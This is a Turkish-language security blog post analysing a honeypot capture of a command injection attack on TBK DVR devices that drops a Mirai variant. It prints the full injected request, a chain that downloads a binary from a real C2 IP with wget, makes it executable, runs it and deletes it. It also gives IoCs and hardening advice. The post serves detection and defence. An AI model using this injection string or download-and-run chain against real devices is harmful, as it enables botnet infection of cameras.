Honeypot'a Düşen IoT Malware — TBK DVR Exploit ve Mirai Botnet
Web honeypot'umuza gelen bir HTTP isteği, TBK marka DVR cihazlarını hedef alan command injection saldırısını ve Mirai botnet varyantını ortaya çıkardı. Teknik analiz ve korunma yöntemleri.
TL;DR
Honeypot’umuza gelen tek bir HTTP isteği, eksiksiz bir IoT saldırı zincirini ortaya koydu:
- TBK marka DVR/NVR cihazlarında command injection zafiyeti
- ARM7 mimarisi için derlenmiş Mirai varyantı payload
- Bulgaristan’daki C2 sunucusundan indirme
- Çalıştır ve kendini sil (anti-forensic)
Türkiye’deki güvenlik kamerası altyapısının önemli bir kısmı bu marka cihazları kullanıyor.
Saldırı Anatomisi
7 Nisan 2026, 15:50 UTC — Tanner/Snare web honeypot’umuza (İstanbul DC) bir HTTP GET isteği geldi:
GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
&mdb=sos
&mdc=cd /tmp;
rm arm7;
wget http://87.121.112.57/kkk.arm7;
chmod 777 kkk.arm7;
./kkk.arm7 tbk.ebk;
rm -rf kkk.arm7
Host: [honeypot IP]Adım Adım
| Adım | Komut | Amaç |
|---|---|---|
| 1 | cd /tmp | Yazılabilir dizine geç |
| 2 | rm arm7 | Varsa eski payload’u temizle |
| 3 | wget http://87.121.112.57/kkk.arm7 | C2’den yeni payload indir |
| 4 | chmod 777 kkk.arm7 | Çalıştırma izni ver |
| 5 | ./kkk.arm7 tbk.ebk | Payload’u çalıştır (parametre: tbk.ebk) |
| 6 | rm -rf kkk.arm7 | İzi sil |
tbk.ebk parametresi muhtemelen botnet’e kayıt sırasında kullanılan bir tanımlayıcı veya kampanya kodu.
Zafiyet: TBK DVR Command Injection
/device.rsp endpoint’i TBK (TopBrand/Provision) marka DVR ve NVR cihazlarının web arayüzüne ait. ___S_O_S_T_R_E_A_MAX___ değeri, cihazın streaming modülündeki bir command injection noktasını tetikliyor.
Bu zafiyet:
- CVE numarası: Kesin atama belirsiz, ancak TBK DVR firmware’lerinde bilinen bir sorun
- Etki: Uzaktan kod çalıştırma (RCE) — kimlik doğrulaması gerekmez
- Etkilenen cihazlar: TBK DVR4104, DVR4216 ve OEM versiyonları (Provision-ISR, Night Owl, Q-See)
- Yaygınlık: Shodan’da 50.000+ açık cihaz (küresel)
Payload: Mirai Varyantı
kkk.arm7 dosya adı ve ARM7 mimarisi hedeflemesi klasik Mirai botnet özelliği. Mirai varyantları genellikle:
- ARM, MIPS, x86 gibi birden fazla mimari için derlenir
- Aynı C2’de
kkk.arm7,kkk.mips,kkk.x86gibi dosyalar bulunur - DDoS (UDP/TCP flood), credential stuffing ve lateral movement yapabilir
Tehdit Aktörleri
| Rol | IP | Konum | ASN |
|---|---|---|---|
| Scanner/Exploiter | 176.65.148.127 | Rusya | AS211298 Driftnet |
| C2/Dropper | 87.121.112.57 | Bulgaristan | — |
176.65.148.x subnet’i honeypot verilerimizde tekrar eden bir kaynak. Muhtemelen kiralık VPS altyapısı üzerinde çalışan otomatik bir scanning framework.
Türkiye Etkisi
TBK ve OEM markalarının Türkiye’deki dağılımı:
- Provision-ISR: Türkiye’de yaygın güvenlik kamerası markası
- Night Owl: Online satış platformlarında mevcut
- Birçok yerel güvenlik firması TBK OEM ürünleri satıyor
Bu cihazlar genellikle:
- Varsayılan şifreyle bırakılıyor (admin/admin veya admin/123456)
- Firmware hiç güncellenmiyor
- Doğrudan internete (port 80/8080) açılıyor
- NAT arkasında bile UPnP ile otomatik port açıyor
Korunma
DVR/NVR Sahipleri İçin
- Firmware güncelleyin — üretici sitesinden son sürümü indirin
- Varsayılan şifreyi değiştirin — 12+ karakter, rastgele
- Web arayüzünü internete kapatın — VPN üzerinden erişin
- UPnP’yi devre dışı bırakın — router’ınızda kapatın
- Cihaz güncellenemiyorsa — ağdan izole edin (VLAN)
ISP Operatörleri İçin
- Port 80/8080’den gelen
/device.rspisteklerini IDS kuralına ekleyin 87.121.112.57IP’sini bloklayın- Müşteri CPE’lerinde UPnP’yi varsayılan kapalı yapın
IoC — Tehlike Göstergeleri
# Saldırgan IP
176.65.148.127
# C2/Dropper sunucusu
87.121.112.57
# URI Pattern (Suricata/Snort kuralı için)
/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
# Dosya adı pattern
kkk.arm7
kkk.mips
kkk.x86
# Lisans: CC0 — özgürce kullanın